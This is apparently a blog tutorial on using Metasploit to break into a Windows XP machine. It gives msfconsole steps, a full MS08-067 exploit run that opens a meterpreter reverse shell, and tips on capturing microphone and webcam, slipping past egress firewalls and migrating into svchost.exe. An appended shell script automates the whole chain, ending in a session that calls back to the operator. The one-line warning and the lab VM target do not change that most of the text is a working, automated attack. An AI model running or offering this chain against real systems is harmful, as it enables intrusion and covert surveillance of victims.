1. Get a Linux computer with Metasploit installed (or use Kali Linux, the successor to BackTrack).
2. Open a root shell and start the database Metasploit uses for hosts and scan results: #service postgresql start
3. #msfconsole
4. msf >show exploits – to list every exploit module loaded in the framework
5. msf >search unreal – to list the modules whose name or description matches "unreal" (the Unreal game server exploits, for instance)
6. msf >use name_of_exploit_you_want
-msf >show options – to view the options (target, RHOST, payload settings) of the selected exploit
-msf >back – to leave the selected exploit
8. msf >host madunix.com – resolve the target's name; it prints the IP address. (msfconsole passes commands it does not recognise, such as host and nmap, straight through to the system shell.)
– nmap works the same way from within msfconsole. Try nmap -sV 1.2.3.4 to identify the versions of listening services, or db_nmap with the same arguments to store the results in the database.
9. msf >set RHOST 1.2.3.4 – the target (the option is spelled RHOSTS in current releases)
10. msf> set PAYLOAD windows/shell/reverse_tcp – a reverse command shell; pick windows/meterpreter/reverse_tcp instead for the meterpreter session shown in the sample below
11. msf > set LHOST <your IP> – the address the reverse payload connects back to, i.e. the machine where your handler listens
12. msf > set LPORT <port> – the port the handler listens on at LHOST. Choosing a port the target is allowed to reach outbound (443, for example) gets the connection back through egress firewalls
13. msf >exploit (or run) – to launch the exploit
14. msf >sessions – to show current sessions
15. msf >sessions -i <ID> (from the list above) – to interact with that session

Fun stuff but don’t point these tools at other peoples’ systems or you can be liable for damage and/or criminal charges.

Anyhow, here's a sample attack sequence against a default-install Windows XP SP2 box:

msf exploit(ms08_067_netapi) > set rhost 10.0.1.17
rhost => 10.0.1.17
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.0.1.48:4444
[*] 10.0.1.17:445 – Automatically detecting the target…
[*] 10.0.1.17:445 – Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] 10.0.1.17:445 – Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 10.0.1.17:445 – Attempting to trigger the vulnerability…
[*] Sending stage (957999 bytes) to 10.0.1.17
[*] Meterpreter session 1 opened (10.0.1.48:4444 -> 10.0.1.17:1064) at 2017-02-19 03:29:59 -0500

meterpreter >

This prompt means you have a meterpreter session on the remote target. Type ? to see the command list, which includes things like record_mic (captures audio from the target's microphone to a .wav file) and webcam_snap (takes a still picture with the web cam, saved as a .jpeg). The captures are written to the operator's machine, not left on the target.

Most things you could do at a command prompt on the Windows box are possible from here (the shell command drops you into cmd.exe), plus a lot of meterpreter-specific commands that are not.

This attack was carried out on an XP SP2 virtual machine and operated until I turned the firewall on and the session died with a blunt message:
[*] 10.0.1.17 – Meterpreter session 1 closed.  Reason: Died

Interestingly, during this whole process, not one single Windows log file reflected the incident. Stunning that security logging is disabled by default on “Our most advanced and secure release yet”. Wow.

Lastly, one of the most interesting capabilities of the meterpreter shell in the Metasploit Framework is that you can run ps to get a list of running processes and use the migrate command to hop into another one: meterpreter injects its payload into the chosen process and carries on running from there, so the session no longer depends on the process the exploit originally landed in.

You'll want to pick a stable, long-lived process such as explorer.exe or svchost.exe so the session survives; those are not going away while the user is logged on or the system is up. Two caveats: you can only migrate into a process the current session has the rights to open, and the new session runs in the context of the process you moved into, so migrating from a SYSTEM session into explorer.exe (which runs as the logged-on user) drops you to that user's privileges. If the injection fails or the chosen process exits, the session dies with it.

I selected a separate instance of svchost.exe by PID and the meterpreter shell died. It happens.
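The whole walkthrough, steps 1 to 15 plus the migration advice just above, fits in one Metasploit resource script. The shell script below is an added example, not code from the original post: it validates the addresses, generates the resource file, and lets the session migrate itself as soon as it opens instead of relying on a hand-picked svchost.exe PID. The workspace name lab, the /tmp path and the helper names are my assumptions; the msfconsole flags, options and module names are real.

```shell
#!/bin/sh
# Added example (not from the original post): automates the msfconsole
# walkthrough above as a Metasploit resource script and has the session
# migrate itself as soon as it opens. Paths, the workspace name and the
# helper names are assumptions; msfconsole flags and module names are real.
set -eu

# Dotted-quad check, so a typo cannot point the handler at the wrong box.
# Returns 0 for a valid IPv4 address, 1 for anything else (hostnames too).
valid_ipv4() {
  ip=$1
  case $ip in
    *[!0-9.]* | .* | *. | *..*) return 1 ;;
  esac
  old_ifs=$IFS
  IFS=.
  set -- $ip
  IFS=$old_ifs
  [ "$#" -eq 4 ] || return 1
  for octet in "$@"; do
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# write_rc OUTFILE RHOST LHOST LPORT: writes the resource script.
# RHOSTS is the target; LHOST/LPORT are where the reverse payload calls back,
# i.e. the attacker's handler (the page's 2017-era console spelled the target
# option RHOST; current releases use RHOSTS and still accept RHOST).
# windows/meterpreter/reverse_tcp gives the meterpreter prompt seen on the
# page; windows/shell/reverse_tcp would only give a cmd.exe session.
# post/windows/manage/migrate runs automatically once the session opens and
# by default spawns a fresh process to live in, instead of guessing at a
# svchost.exe PID by hand.
write_rc() {
  out=$1 rhost=$2 lhost=$3 lport=$4
  valid_ipv4 "$rhost" && valid_ipv4 "$lhost" || return 1
  [ "$lport" -ge 1 ] && [ "$lport" -le 65535 ] || return 1
  cat > "$out" <<EOF
workspace -a lab
db_nmap -sV -p 445 $rhost
use exploit/windows/smb/ms08_067_netapi
set RHOSTS $rhost
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set AutoRunScript post/windows/manage/migrate
exploit -j
sleep 15
sessions -l
EOF
}

# run_rc RCFILE: feeds the script to msfconsole when it is installed
# (-q skips the banner, -r loads a resource file); otherwise prints the
# command to run by hand, which is what happens on a box without Metasploit.
run_rc() {
  rc=$1
  if command -v msfconsole >/dev/null 2>&1; then
    msfconsole -q -r "$rc"
  else
    printf 'msfconsole not found; run: msfconsole -q -r %s\n' "$rc"
  fi
}

# Usage: sh msf_lab.sh <target IP> <your IP> [handler port, default 4444]
if [ "$#" -ge 2 ]; then
  write_rc /tmp/ms08_067.rc "$1" "$2" "${3:-4444}" \
    || { echo "bad IP address or port" >&2; exit 1; }
  run_rc /tmp/ms08_067.rc
fi
```

Run it from the Kali box with postgresql already started, e.g. sh msf_lab.sh 10.0.1.17 10.0.1.48 using the addresses from the sample above. The handler is started as a background job, the meterpreter session opens into a freshly spawned process rather than the exploited service, and sessions -l shows the session ID to pass to sessions -i.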